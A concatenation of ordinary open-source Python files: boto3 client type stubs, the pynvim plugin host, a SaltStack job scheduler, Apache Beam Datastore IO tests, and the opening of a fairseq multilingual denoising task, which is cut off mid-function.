""":type : pyboto3.qldb_session"""
quicksight = boto3.client("quicksight")
""":type : pyboto3.quicksight"""
ram = boto3.client("ram")
""":type : pyboto3.ram"""
rds = boto3.client("rds")
""":type : pyboto3.rds"""
rds_data = boto3.client("rds-data")
""":type : pyboto3.rds_data"""
redshift = boto3.client("redshift")
""":type : pyboto3.redshift"""
rekognition = boto3.client("rekognition")
""":type : pyboto3.rekognition"""
resource_groups = boto3.client("resource-groups")
""":type : pyboto3.resource_groups"""
resourcegroupstaggingapi = boto3.client("resourcegroupstaggingapi")
""":type : pyboto3.resourcegroupstaggingapi"""
robomaker = boto3.client("robomaker")
""":type : pyboto3.robomaker"""
route53 = boto3.client("route53")
""":type : pyboto3.route53"""
route53domains = boto3.client("route53domains")
""":type : pyboto3.route53domains"""
route53resolver = boto3.client("route53resolver")
""":type : pyboto3.route53resolver"""
s3 = boto3.client("s3")
""":type : pyboto3.s3"""
s3control = boto3.client("s3control")
""":type : pyboto3.s3control"""
sagemaker = boto3.client("sagemaker")
""":type : pyboto3.sagemaker"""
sagemaker_a2i_runtime = boto3.client("sagemaker-a2i-runtime")
""":type : pyboto3.sagemaker_a2i_runtime"""
sagemaker_runtime = boto3.client("sagemaker-runtime")
""":type : pyboto3.sagemaker_runtime"""
savingsplans = boto3.client("savingsplans")
""":type : pyboto3.savingsplans"""
schemas = boto3.client("schemas")
""":type : pyboto3.schemas"""
sdb = boto3.client("sdb")
""":type : pyboto3.sdb"""
secretsmanager = boto3.client("secretsmanager")
""":type : pyboto3.secretsmanager"""
securityhub = boto3.client("securityhub")
""":type : pyboto3.securityhub"""
serverlessrepo = boto3.client("serverlessrepo")
""":type : pyboto3.serverlessrepo"""
service_quotas = boto3.client("service-quotas")
""":type : pyboto3.service_quotas"""
servicecatalog = boto3.client("servicecatalog")
""":type : pyboto3.servicecatalog"""
servicediscovery = boto3.client("servicediscovery")
""":type : pyboto3.servicediscovery"""
ses = boto3.client("ses")
""":type : pyboto3.ses"""
sesv2 = boto3.client("sesv2")
""":type : pyboto3.sesv2"""
shield = boto3.client("shield")
""":type : pyboto3.shield"""
signer = boto3.client("signer")
""":type : pyboto3.signer"""
sms = boto3.client("sms")
""":type : pyboto3.sms"""
sms_voice = boto3.client("sms-voice")
""":type : pyboto3.sms_voice"""
snowball = boto3.client("snowball")
""":type : pyboto3.snowball"""
sns = boto3.client("sns")
""":type : pyboto3.sns"""
sqs = boto3.client("sqs")
""":type : pyboto3.sqs"""
ssm = boto3.client("ssm")
""":type : pyboto3.ssm"""
sso = boto3.client("sso")
""":type : pyboto3.sso"""
sso_oidc = boto3.client("sso-oidc")
""":type : pyboto3.sso_oidc"""
stepfunctions = boto3.client("stepfunctions")
""":type : pyboto3.stepfunctions"""
storagegateway = boto3.client("storagegateway")
""":type : pyboto3.storagegateway"""
sts = boto3.client("sts")
""":type : pyboto3.sts"""
support = boto3.client("support")
""":type : pyboto3.support"""
swf = boto3.client("swf")
""":type : pyboto3.swf"""
synthetics = boto3.client("synthetics")
""":type : pyboto3.synthetics"""
textract = boto3.client("textract")
""":type : pyboto3.textract"""
transcribe = boto3.client("transcribe")
""":type : pyboto3.transcribe"""
transfer = boto3.client("transfer")
""":type : pyboto3.transfer"""
translate = boto3.client("translate")
""":type : pyboto3.translate"""
waf = boto3.client("waf")
""":type : pyboto3.waf"""
waf_regional = boto3.client("waf-regional")
""":type : pyboto3.waf_regional"""
wafv2 = boto3.client("wafv2")
""":type : pyboto3.wafv2"""
workdocs = boto3.client("workdocs")
""":type : pyboto3.workdocs"""
worklink = boto3.client("worklink")
""":type : pyboto3.worklink"""
workmail = boto3.client("workmail")
""":type : pyboto3.workmail"""
workmailmessageflow = boto3.client("workmailmessageflow")
""":type : pyboto3.workmailmessageflow"""
workspaces = boto3.client("workspaces")
""":type : pyboto3.workspaces"""
xray = boto3.client("xray")
""":type : pyboto3.xray"""
| |
"""Implements a Nvim host for python plugins."""
import imp
import inspect
import logging
import os
import os.path
import re
from functools import partial
from traceback import format_exc
from pynvim.api import decode_if_bytes, walk
from pynvim.compat import IS_PYTHON3, find_module
from pynvim.msgpack_rpc import ErrorResponse
from pynvim.plugin import script_host
from pynvim.util import format_exc_skip, get_client_info
__all__ = ('Host')
logger = logging.getLogger(__name__)
error, debug, info, warn = (logger.error, logger.debug, logger.info,
logger.warning,)
host_method_spec = {"poll": {}, "specs": {"nargs": 1}, "shutdown": {}}
class Host(object):
"""Nvim host for python plugins.
Takes care of loading/unloading plugins and routing msgpack-rpc
requests/notifications to the appropriate handlers.
"""
def __init__(self, nvim):
"""Set handlers for plugin_load/plugin_unload."""
self.nvim = nvim
self._specs = {}
self._loaded = {}
self._load_errors = {}
self._notification_handlers = {
'nvim_error_event': self._on_error_event
}
self._request_handlers = {
'poll': lambda: 'ok',
'specs': self._on_specs_request,
'shutdown': self.shutdown
}
# Decode per default for Python3
self._decode_default = IS_PYTHON3
def _on_async_err(self, msg):
# uncaught python exception
self.nvim.err_write(msg, async_=True)
def _on_error_event(self, kind, msg):
# error from nvim due to async request
# like nvim.command(..., async_=True)
errmsg = "{}: Async request caused an error:\n{}\n".format(
self.name, decode_if_bytes(msg))
self.nvim.err_write(errmsg, async_=True)
return errmsg
def start(self, plugins):
"""Start listening for msgpack-rpc requests and notifications."""
self.nvim.run_loop(self._on_request,
self._on_notification,
lambda: self._load(plugins),
err_cb=self._on_async_err)
def shutdown(self):
"""Shutdown the host."""
self._unload()
self.nvim.stop_loop()
def _wrap_delayed_function(self, cls, delayed_handlers, name, sync,
module_handlers, path, *args):
# delete the delayed handlers to be sure
for handler in delayed_handlers:
method_name = handler._nvim_registered_name
if handler._nvim_rpc_sync:
del self._request_handlers[method_name]
else:
del self._notification_handlers[method_name]
# create an instance of the plugin and pass the nvim object
plugin = cls(self._configure_nvim_for(cls))
# discover handlers in the plugin instance
self._discover_functions(plugin, module_handlers, path, False)
if sync:
self._request_handlers[name](*args)
else:
self._notification_handlers[name](*args)
def _wrap_function(self, fn, sync, decode, nvim_bind, name, *args):
if decode:
args = walk(decode_if_bytes, args, decode)
if nvim_bind is not None:
args.insert(0, nvim_bind)
try:
return fn(*args)
except Exception:
if sync:
msg = ("error caught in request handler '{} {}':\n{}"
.format(name, args, format_exc_skip(1)))
raise ErrorResponse(msg)
else:
msg = ("error caught in async handler '{} {}'\n{}\n"
.format(name, args, format_exc_skip(1)))
self._on_async_err(msg + "\n")
def _on_request(self, name, args):
"""Handle a msgpack-rpc request."""
if IS_PYTHON3:
name = decode_if_bytes(name)
handler = self._request_handlers.get(name, None)
if not handler:
msg = self._missing_handler_error(name, 'request')
error(msg)
raise ErrorResponse(msg)
debug('calling request handler for "%s", args: "%s"', name, args)
rv = handler(*args)
debug("request handler for '%s %s' returns: %s", name, args, rv)
return rv
def _on_notification(self, name, args):
"""Handle a msgpack-rpc notification."""
if IS_PYTHON3:
name = decode_if_bytes(name)
handler = self._notification_handlers.get(name, None)
if not handler:
msg = self._missing_handler_error(name, 'notification')
error(msg)
self._on_async_err(msg + "\n")
return
debug('calling notification handler for "%s", args: "%s"', name, args)
handler(*args)
def _missing_handler_error(self, name, kind):
msg = 'no {} handler registered for "{}"'.format(kind, name)
pathmatch = re.match(r'(.+):[^:]+:[^:]+', name)
if pathmatch:
loader_error = self._load_errors.get(pathmatch.group(1))
if loader_error is not None:
msg = msg + "\n" + loader_error
return msg
def _load(self, plugins):
has_script = False
for path in plugins:
err = None
if path in self._loaded:
error('{} is already loaded'.format(path))
continue
try:
if path == "script_host.py":
module = script_host
has_script = True
else:
directory, name = os.path.split(os.path.splitext(path)[0])
file, pathname, descr = find_module(name, [directory])
module = imp.load_module(name, file, pathname, descr)
handlers = []
self._discover_classes(module, handlers, path)
self._discover_functions(module, handlers, path, False)
if not handlers:
error('{} exports no handlers'.format(path))
continue
self._loaded[path] = {'handlers': handlers, 'module': module}
except Exception as e:
err = ('Encountered {} loading plugin at {}: {}\n{}'
.format(type(e).__name__, path, e, format_exc(5)))
error(err)
self._load_errors[path] = err
kind = ("script-host" if len(plugins) == 1 and has_script
else "rplugin-host")
info = get_client_info(kind, 'host', host_method_spec)
self.name = info[0]
self.nvim.api.set_client_info(*info, async_=True)
def _unload(self):
for path, plugin in self._loaded.items():
handlers = plugin['handlers']
for handler in handlers:
method_name = handler._nvim_registered_name
if hasattr(handler, '_nvim_shutdown_hook'):
handler()
elif handler._nvim_rpc_sync:
del self._request_handlers[method_name]
else:
del self._notification_handlers[method_name]
self._specs = {}
self._loaded = {}
def _discover_classes(self, module, handlers, plugin_path):
for _, cls in inspect.getmembers(module, inspect.isclass):
if getattr(cls, '_nvim_plugin', False):
# discover handlers in the plugin instance
self._discover_functions(cls, handlers, plugin_path, True)
def _discover_functions(self, obj, handlers, plugin_path, delay):
def predicate(o):
return hasattr(o, '_nvim_rpc_method_name')
cls_handlers = []
specs = []
objdecode = getattr(obj, '_nvim_decode', self._decode_default)
for _, fn in inspect.getmembers(obj, predicate):
method = fn._nvim_rpc_method_name
if fn._nvim_prefix_plugin_path:
method = '{}:{}'.format(plugin_path, method)
sync = fn._nvim_rpc_sync
if delay:
fn_wrapped = partial(self._wrap_delayed_function, obj,
cls_handlers, method, sync,
handlers, plugin_path)
else:
decode = getattr(fn, '_nvim_decode', objdecode)
nvim_bind = None
if fn._nvim_bind:
nvim_bind = self._configure_nvim_for(fn)
fn_wrapped = partial(self._wrap_function, fn,
sync, decode, nvim_bind, method)
self._copy_attributes(fn, fn_wrapped)
fn_wrapped._nvim_registered_name = method
# register in the rpc handler dict
if sync:
if method in self._request_handlers:
raise Exception(('Request handler for "{}" is '
+ 'already registered').format(method))
self._request_handlers[method] = fn_wrapped
else:
if method in self._notification_handlers:
raise Exception(('Notification handler for "{}" is '
+ 'already registered').format(method))
self._notification_handlers[method] = fn_wrapped
if hasattr(fn, '_nvim_rpc_spec'):
specs.append(fn._nvim_rpc_spec)
handlers.append(fn_wrapped)
cls_handlers.append(fn_wrapped)
if specs:
self._specs[plugin_path] = specs
def _copy_attributes(self, fn, fn2):
# Copy _nvim_* attributes from the original function
for attr in dir(fn):
if attr.startswith('_nvim_'):
setattr(fn2, attr, getattr(fn, attr))
def _on_specs_request(self, path):
if IS_PYTHON3:
path = decode_if_bytes(path)
if path in self._load_errors:
self.nvim.out_write(self._load_errors[path] + '\n')
return self._specs.get(path, 0)
def _configure_nvim_for(self, obj):
# Configure a nvim instance for obj (checks encoding configuration)
nvim = self.nvim
decode = getattr(obj, '_nvim_decode', self._decode_default)
if decode:
nvim = nvim.with_decode(decode)
return nvim
| |
# -*- coding: utf-8 -*-
'''
Scheduling routines are located here. To activate the scheduler make the
schedule option available to the master or minion configurations (master config
file or for the minion via config or pillar)
code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour)
The scheduler also supports ensuring that there are no more than N copies of
a particular routine running. Use this for jobs that may be long-running
and could step on each other or pile up in case of infrastructure outage.
The default for maxrunning is 1.
code-block:: yaml
schedule:
long_running_job:
function: big_file_transfer
jid_include: True
maxrunning: 1
'''
# Import python libs
import os
import time
import datetime
import multiprocessing
import threading
import sys
import logging
# Import Salt libs
import salt.utils
import salt.utils.process
from salt.utils.odict import OrderedDict
import salt.payload
log = logging.getLogger(__name__)
class Schedule(object):
'''
Create a Schedule object, pass in the opts and the functions dict to use
'''
def __init__(self, opts, functions, returners=None, intervals=None):
self.opts = opts
self.functions = functions
if isinstance(intervals, dict):
self.intervals = intervals
else:
self.intervals = {}
if isinstance(returners, dict):
self.returners = returners
else:
self.returners = {}
self.schedule_returner = self.option('schedule_returner')
# Keep track of the lowest loop interval needed in this variable
self.loop_interval = sys.maxint
clean_proc_dir(opts)
def option(self, opt):
'''
Return the schedule data structure
'''
if 'config.merge' in self.functions:
return self.functions['config.merge'](opt, {}, omit_master=True)
return self.opts.get(opt, {})
def handle_func(self, func, data):
'''
Execute this method in a multiprocess or thread
'''
if salt.utils.is_windows():
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
ret = {'id': self.opts.get('id', 'master'),
'fun': func,
'jid': '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now())}
proc_fn = os.path.join(
salt.minion.get_proc_dir(self.opts['cachedir']),
ret['jid']
)
# Check to see if there are other jobs with this
# signature running. If there are more than maxrunning
# jobs present then don't start another.
# If jid_include is False for this job we can ignore all this
# NOTE--jid_include defaults to True, thus if it is missing from the data
# dict we treat it like it was there and is True
if 'jid_include' not in data or data['jid_include']:
jobcount = 0
for basefilename in os.listdir(salt.minion.get_proc_dir(self.opts['cachedir'])):
fn = os.path.join(salt.minion.get_proc_dir(self.opts['cachedir']), basefilename)
with salt.utils.fopen(fn, 'r') as fp_:
job = salt.payload.Serial(self.opts).load(fp_)
log.debug('schedule.handle_func: Checking job against '
'fun {0}: {1}'.format(ret['fun'], job))
if ret['fun'] == job['fun']:
jobcount += 1
log.debug(
'schedule.handle_func: Incrementing jobcount, now '
'{0}, maxrunning is {1}'.format(
jobcount, data['maxrunning']))
if jobcount >= data['maxrunning']:
log.debug(
'schedule.handle_func: The scheduled job {0} '
'was not started, {1} already running'.format(
func, data['maxrunning']))
return False
salt.utils.daemonize_if(self.opts)
ret['pid'] = os.getpid()
if 'jid_include' not in data or data['jid_include']:
log.debug('schedule.handle_func: adding this job to the jobcache '
'with data {0}'.format(ret))
# write this to /var/cache/salt/minion/proc
with salt.utils.fopen(proc_fn, 'w+') as fp_:
fp_.write(salt.payload.Serial(self.opts).dumps(ret))
args = None
if 'args' in data:
args = data['args']
kwargs = None
if 'kwargs' in data:
kwargs = data['kwargs']
if args and kwargs:
ret['return'] = self.functions[func](*args, **kwargs)
if args and not kwargs:
ret['return'] = self.functions[func](*args)
if kwargs and not args:
ret['return'] = self.functions[func](**kwargs)
if not kwargs and not args:
ret['return'] = self.functions[func]()
data_returner = data.get('returner', None)
if data_returner or self.schedule_returner:
rets = []
for returner in [data_returner, self.schedule_returner]:
if isinstance(returner, str):
rets.append(returner)
elif isinstance(returner, list):
rets.extend(returner)
# simple de-duplication with order retained
rets = OrderedDict.fromkeys(rets).keys()
for returner in rets:
ret_str = '{0}.returner'.format(returner)
if ret_str in self.returners:
ret['success'] = True
self.returners[ret_str](ret)
else:
log.info(
'Job {0} using invalid returner: {1} Ignoring.'.format(
func, returner
)
)
try:
os.unlink(proc_fn)
except OSError:
pass
def eval(self):
'''
Evaluate and execute the schedule
'''
schedule = self.option('schedule')
if not isinstance(schedule, dict):
return
for job, data in schedule.items():
if 'function' in data:
func = data['function']
elif 'func' in data:
func = data['func']
elif 'fun' in data:
func = data['fun']
else:
func = None
if func not in self.functions:
log.info(
'Invalid function: {0} in job {1}. Ignoring.'.format(
job, func
)
)
continue
# Add up how many seconds between now and then
seconds = 0
seconds += int(data.get('seconds', 0))
seconds += int(data.get('minutes', 0)) * 60
seconds += int(data.get('hours', 0)) * 3600
seconds += int(data.get('days', 0)) * 86400
# Check if the seconds variable is lower than current lowest
# loop interval needed. If it is lower then overwrite variable
# external loops using can then check this variable for how often
# they need to reschedule themselves
if seconds < self.loop_interval:
self.loop_interval = seconds
now = int(time.time())
run = False
if job in self.intervals:
if now - self.intervals[job] >= seconds:
run = True
else:
run = True
if not run:
continue
else:
log.debug('Running scheduled job: {0}'.format(job))
if 'jid_include' not in data or data['jid_include']:
data['jid_include'] = True
log.debug('schedule: This job was scheduled with jid_include, '
'adding to cache (jid_include defaults to True)')
if 'maxrunning' in data:
log.debug('schedule: This job was scheduled with a max '
'number of {0}'.format(data['maxrunning']))
else:
log.info('schedule: maxrunning parameter was not specified for '
'job {0}, defaulting to 1.'.format(job))
data['maxrunning'] = 1
try:
if self.opts.get('multiprocessing', True):
thread_cls = multiprocessing.Process
else:
thread_cls = threading.Thread
proc = thread_cls(target=self.handle_func, args=(func, data))
proc.start()
if self.opts.get('multiprocessing', True):
proc.join()
finally:
self.intervals[job] = int(time.time())
def clean_proc_dir(opts):
'''
Loop through jid files in the minion proc directory (default /var/cache/salt/minion/proc)
and remove any that refer to processes that no longer exist
'''
for basefilename in os.listdir(salt.minion.get_proc_dir(opts['cachedir'])):
fn = os.path.join(salt.minion.get_proc_dir(opts['cachedir']), basefilename)
with salt.utils.fopen(fn, 'r') as fp_:
job = salt.payload.Serial(opts).load(fp_)
log.debug('schedule.clean_proc_dir: checking job {0} for process '
'existence'.format(job))
if job is not None and 'pid' in job:
if salt.utils.process.os_is_running(job['pid']):
log.debug('schedule.clean_proc_dir: Cleaning proc dir, '
'pid {0} still exists.'.format(job['pid']))
else:
# Windows cannot delete an open file
if salt.utils.is_windows():
fp_.close()
# Maybe the file is already gone
try:
os.unlink(fn)
except OSError:
pass
| |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from mock import MagicMock
from mock import call
from mock import patch
from apache_beam.io.gcp.datastore.v1 import fake_datastore
from apache_beam.io.gcp.datastore.v1 import helper
from apache_beam.io.gcp.datastore.v1 import query_splitter
from apache_beam.io.gcp.datastore.v1.datastoreio import ReadFromDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import WriteToDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import _Mutate
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
from google.cloud.proto.datastore.v1 import query_pb2
from google.protobuf import timestamp_pb2
from googledatastore import helper as datastore_helper
except ImportError:
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
class DatastoreioTest(unittest.TestCase):
_PROJECT = 'project'
_KIND = 'kind'
_NAMESPACE = 'namespace'
def setUp(self):
self._mock_datastore = MagicMock()
self._query = query_pb2.Query()
self._query.kind.add().name = self._KIND
def test_get_estimated_size_bytes_without_namespace(self):
entity_bytes = 100
timestamp = timestamp_pb2.Timestamp(seconds=1234)
self.check_estimated_size_bytes(entity_bytes, timestamp)
def test_get_estimated_size_bytes_with_namespace(self):
entity_bytes = 100
timestamp = timestamp_pb2.Timestamp(seconds=1234)
self.check_estimated_size_bytes(entity_bytes, timestamp, self._NAMESPACE)
def test_SplitQueryFn_with_num_splits(self):
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
num_splits = 23
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter, 'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), num_splits)
self.assertEqual(0, len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_without_num_splits(self):
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 23
entity_bytes = (expected_num_splits *
ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore, 'get_estimated_size_bytes',
return_value=entity_bytes):
def fake_get_splits(datastore, query, num_splits, partition=None):
return self.split_query(query, num_splits)
with patch.object(query_splitter, 'get_splits',
side_effect=fake_get_splits):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(0,
len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_SplitQueryFn_with_query_limit(self):
"""A test that verifies no split is performed when the query has a limit."""
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
self._query.limit.value = 3
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, 4)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(1, len(returned_split_queries))
self.assertEqual(0, len(self._mock_datastore.method_calls))
def test_SplitQueryFn_with_exception(self):
"""A test that verifies that no split is performed when failures occur."""
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
# Force SplitQueryFn to compute the number of query splits
num_splits = 0
expected_num_splits = 1
entity_bytes = (expected_num_splits *
ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)
with patch.object(ReadFromDatastore, 'get_estimated_size_bytes',
return_value=entity_bytes):
with patch.object(query_splitter, 'get_splits',
side_effect=ValueError("Testing query split error")):
split_query_fn = ReadFromDatastore.SplitQueryFn(
self._PROJECT, self._query, None, num_splits)
split_query_fn.start_bundle()
returned_split_queries = []
for split_query in split_query_fn.process(self._query):
returned_split_queries.append(split_query)
self.assertEqual(len(returned_split_queries), expected_num_splits)
self.assertEqual(returned_split_queries[0][1], self._query)
self.assertEqual(0,
len(self._mock_datastore.run_query.call_args_list))
self.verify_unique_keys(returned_split_queries)
def test_DatastoreWriteFn_with_emtpy_batch(self):
self.check_DatastoreWriteFn(0)
def test_DatastoreWriteFn_with_one_batch(self):
num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 1 - 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_multiple_batches(self):
num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 3 + 50
self.check_DatastoreWriteFn(num_entities_to_write)
def test_DatastoreWriteFn_with_batch_size_exact_multiple(self):
num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 2
self.check_DatastoreWriteFn(num_entities_to_write)
def check_DatastoreWriteFn(self, num_entities):
"""A helper function to test DatastoreWriteFn."""
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
entities = [e.entity for e in
fake_datastore.create_entities(num_entities)]
expected_mutations = map(WriteToDatastore.to_upsert_mutation, entities)
actual_mutations = []
self._mock_datastore.commit.side_effect = (
fake_datastore.create_commit(actual_mutations))
datastore_write_fn = _Mutate.DatastoreWriteFn(
self._PROJECT, fixed_batch_size=_Mutate._WRITE_BATCH_INITIAL_SIZE)
datastore_write_fn.start_bundle()
for mutation in expected_mutations:
datastore_write_fn.process(mutation)
datastore_write_fn.finish_bundle()
self.assertEqual(actual_mutations, expected_mutations)
self.assertEqual(
(num_entities - 1) / _Mutate._WRITE_BATCH_INITIAL_SIZE + 1,
self._mock_datastore.commit.call_count)
def test_DatastoreWriteLargeEntities(self):
"""100*100kB entities gets split over two Commit RPCs."""
with patch.object(helper, 'get_datastore',
return_value=self._mock_datastore):
entities = [e.entity for e in fake_datastore.create_entities(100)]
datastore_write_fn = _Mutate.DatastoreWriteFn(
self._PROJECT, fixed_batch_size=_Mutate._WRITE_BATCH_INITIAL_SIZE)
datastore_write_fn.start_bundle()
for entity in entities:
datastore_helper.add_properties(
entity, {'large': u'A' * 100000}, exclude_from_indexes=True)
datastore_write_fn.process(WriteToDatastore.to_upsert_mutation(entity))
datastore_write_fn.finish_bundle()
self.assertEqual(2, self._mock_datastore.commit.call_count)
def verify_unique_keys(self, queries):
"""A helper function that verifies if all the queries have unique keys."""
keys, _ = zip(*queries)
keys = set(keys)
self.assertEqual(len(keys), len(queries))
def check_estimated_size_bytes(self, entity_bytes, timestamp, namespace=None):
"""A helper method to test get_estimated_size_bytes"""
timestamp_req = helper.make_request(
self._PROJECT, namespace, helper.make_latest_timestamp_query(namespace))
timestamp_resp = self.make_stats_response(
{'timestamp': datastore_helper.from_timestamp(timestamp)})
kind_stat_req = helper.make_request(
self._PROJECT, namespace, helper.make_kind_stats_query(
namespace, self._query.kind[0].name,
datastore_helper.micros_from_timestamp(timestamp)))
kind_stat_resp = self.make_stats_response(
{'entity_bytes': entity_bytes})
def fake_run_query(req):
if req == timestamp_req:
return timestamp_resp
elif req == kind_stat_req:
return kind_stat_resp
else:
print kind_stat_req
raise ValueError("Unknown req: %s" % req)
self._mock_datastore.run_query.side_effect = fake_run_query
self.assertEqual(entity_bytes, ReadFromDatastore.get_estimated_size_bytes(
self._PROJECT, namespace, self._query, self._mock_datastore))
self.assertEqual(self._mock_datastore.run_query.call_args_list,
[call(timestamp_req), call(kind_stat_req)])
def make_stats_response(self, property_map):
resp = datastore_pb2.RunQueryResponse()
entity_result = resp.batch.entity_results.add()
datastore_helper.add_properties(entity_result.entity, property_map)
return resp
def split_query(self, query, num_splits):
"""Generate dummy query splits."""
split_queries = []
for _ in range(0, num_splits):
q = query_pb2.Query()
q.CopyFrom(query)
split_queries.append(q)
return split_queries
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
class DynamicWriteBatcherTest(unittest.TestCase):
def setUp(self):
self._batcher = _Mutate._DynamicBatchSizer()
# If possible, keep these test cases aligned with the Java test cases in
# DatastoreV1Test.java
def test_no_data(self):
self.assertEquals(_Mutate._WRITE_BATCH_INITIAL_SIZE,
self._batcher.get_batch_size(0))
def test_fast_queries(self):
self._batcher.report_latency(0, 1000, 200)
self._batcher.report_latency(0, 1000, 200)
self.assertEquals(_Mutate._WRITE_BATCH_MAX_SIZE,
self._batcher.get_batch_size(0))
def test_slow_queries(self):
self._batcher.report_latency(0, 10000, 200)
self._batcher.report_latency(0, 10000, 200)
self.assertEquals(100, self._batcher.get_batch_size(0))
def test_size_not_below_minimum(self):
self._batcher.report_latency(0, 30000, 50)
self._batcher.report_latency(0, 30000, 50)
self.assertEquals(_Mutate._WRITE_BATCH_MIN_SIZE,
self._batcher.get_batch_size(0))
def test_sliding_window(self):
self._batcher.report_latency(0, 30000, 50)
self._batcher.report_latency(50000, 5000, 200)
self._batcher.report_latency(100000, 5000, 200)
self.assertEquals(200, self._batcher.get_batch_size(150000))
if __name__ == '__main__':
unittest.main()
| |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from fairseq.data import (
data_utils,
Dictionary,
AppendTokenDataset,
ConcatDataset,
DenoisingDataset,
PrependTokenDataset,
ResamplingDataset,
SortDataset,
TokenBlockDataset,
)
from .denoising import DenoisingTask
from fairseq.data.encoders.utils import get_whole_word_mask
from fairseq.tasks import register_task
logger = logging.getLogger(__name__)
@register_task('multilingual_denoising')
class MultilingualDenoisingTask(DenoisingTask):
@staticmethod
def add_args(parser):
DenoisingTask.add_args(parser)
parser.add_argument('--multilang-sampling-alpha', type=float, default=1.0,
help='smoothing alpha for sample ratios across multiple datasets')
parser.add_argument('--add-lang-token', default=False, action='store_true')
parser.add_argument('--langs', type=str, help="language ids we are considering", default=None)
parser.add_argument('--no-whole-word-mask-langs', type=str, default='', metavar='N',
help='languages without spacing between words dont support whole word masking')
@classmethod
def setup_task(cls, args, **kwargs):
"""Setup the task.
"""
paths = args.data.split(':')
assert len(paths) > 0
dictionary = Dictionary.load(os.path.join(paths[0], 'dict.txt'))
data_path = paths[0]
if args.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = args.langs.split(',')
if args.add_lang_token:
for lang in languages:
dictionary.add_symbol('[{}]'.format(lang))
logger.info("dictionary: {} types".format(len(dictionary)))
if not hasattr(args, 'shuffle_instance'):
args.shuffle_instance = False
return cls(args, dictionary)
def __init__(self, args, dictionary):
super().__init__(args, dictionary)
self.dictionary = dictionary
self.seed = args.seed
# add mask token
self.mask_idx = self.dictionary.add_symbol('<mask>')
self.langs = args.langs
self.args = args
def _get_sample_prob(self, dataset_lens):
"""
Get smoothed sampling porbability by languages. This helps low resource
languages by upsampling them.
"""
prob = dataset_lens / dataset_lens.sum()
smoothed_prob = prob ** self.args.multilang_sampling_alpha
smoothed_prob = smoothed_prob / smoothed_prob.sum()
return smoothed_prob
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
paths = self.args.data.split(':')
assert len(paths) > 0
data_path = paths[(epoch - 1) % len(paths)]
split_path = os.path.join(data_path, split)
if self.langs is None:
languages = sorted([
name for name in os.listdir(data_path)
if os.path.isdir(os.path.join(data_path, name))
])
else:
languages = self.langs.split(',')
for name in languages:
p = os.path.join(data_path, name)
assert os.path.exists(p), "data not found: {}".format(p)
logger.info("Training on {0} languages: {1}".format(len(languages), languages))
logger.info("Language to id mapping: ", {
lang: id for id, lang in enumerate(languages)
}
)
mask_whole_words = get_whole_word_mask(self.args, self.dictionary)
language_without_segmentations = self.args.no_whole_word_mask_langs.split(',')
lang_datasets = []
for language in languages:
split_path = os.path.join(data_path, language, split)
dataset = data_utils.load_indexed_dataset(
split_path,
self.source_dictionary,
self.args.dataset_impl,
combine=combine,
)
if dataset is None:
raise FileNotFoundError('Dataset not found: {} ({})'.format(split, split_path))
end_token = self.source_dictionary.index('[{}]'.format(language)) \
if self.args.add_lang_token else self.source_dictionary.eos()
# create continuous blocks of tokens
dataset = TokenBlockDataset(
dataset,
dataset.sizes,
